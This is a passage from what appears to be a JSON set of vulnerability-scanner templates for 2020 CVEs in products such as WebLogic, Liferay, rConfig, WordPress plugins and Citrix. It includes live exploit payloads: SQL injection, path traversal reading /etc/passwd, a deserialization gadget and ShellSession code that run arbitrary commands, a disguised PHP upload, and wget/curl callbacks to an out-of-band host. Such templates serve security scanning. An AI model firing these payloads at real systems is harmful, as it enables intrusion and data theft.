Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"word","part":"body","words":["window.location.href.indexOf"],"negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory 